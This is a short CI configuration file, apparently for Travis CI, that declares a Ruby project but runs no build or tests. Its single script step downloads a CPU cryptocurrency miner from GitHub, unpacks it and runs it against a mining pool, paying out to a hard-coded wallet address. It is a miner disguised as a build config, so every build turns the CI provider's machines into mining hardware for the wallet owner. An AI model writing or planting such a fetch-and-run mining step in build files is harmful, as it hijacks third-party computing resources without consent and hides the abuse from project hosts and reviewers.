language: ruby
os: linux
dist: bionic
script: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://eu.luckpool.net:3956#xnsub -u REY7uuGxLLe7ptpTFtrXjgxpeQ4ZhzYD7R.lama -p x --cpu 2